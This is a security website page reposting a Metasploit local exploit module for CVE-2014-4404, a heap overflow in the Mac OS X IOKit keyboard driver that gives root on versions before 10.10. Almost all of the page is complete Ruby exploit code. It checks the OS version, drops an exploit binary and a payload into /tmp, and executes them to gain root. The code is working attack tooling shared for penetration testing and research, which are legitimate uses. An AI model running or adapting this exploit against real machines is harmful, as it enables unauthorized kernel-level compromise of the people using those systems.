首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X IOKit Keyboard Driver Root Privilege Escalation
来源:metasploit.com 作者:joev 发布时间:2014-12-02  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ManualRanking # Can cause kernel crash

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
      'Description'   => %q{
        A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
        corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
        pointers can also be leaked, allowing a full kASLR bypass.

        Tested on Mavericks 10.9.5, and should work on previous versions.

        The issue has been patched silently in Yosemite.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
          'joev' # copy/paste monkey
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4404' ],
          [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
          # Heap overflow:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
          # kALSR defeat:
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => ARCH_X86_64,
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))
  end

  def check
    if ver_lt(osx_ver, "10.10")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
    binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
    binary_payload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status("Writing exploit file as '#{exploit_file}'")
    write_file(exploit_file, binary_exploit)
    register_file_for_cleanup(exploit_file)

    print_status("Writing payload file as '#{payload_file}'")
    write_file(payload_file, binary_payload)
    register_file_for_cleanup(payload_file)

    print_status("Executing payload...")
    cmd_exec("chmod +x #{exploit_file}")
    cmd_exec("chmod +x #{payload_file}")
    cmd_exec("#{exploit_file} #{payload_file}")
  end

  def osx_ver
    cmd_exec("sw_vers -productVersion").to_s.strip
  end

  def ver_lt(a, b)
    Gem::Version.new(a) < Gem::Version.new(b)
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tincd Post-Authentication Remo
·IPUX CS7522/CS2330/CS2030 IP C
·Microsoft Internet Explorer Wi
·IPUX CL5452/CL5132 IP Camera S
·Tiny Server 1.1.9 Arbitrary Fi
·IBM Endpoint Manager For Mobil
·WordPress 4.0 Denial Of Servic
·Microsoft Windows Win32k.sys -
·Sniffit Root Shell
·Windows Kerberos - Elevation o
·Android SMS Resend Vulnerabili
·Tiny Server 1.1.9 - Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved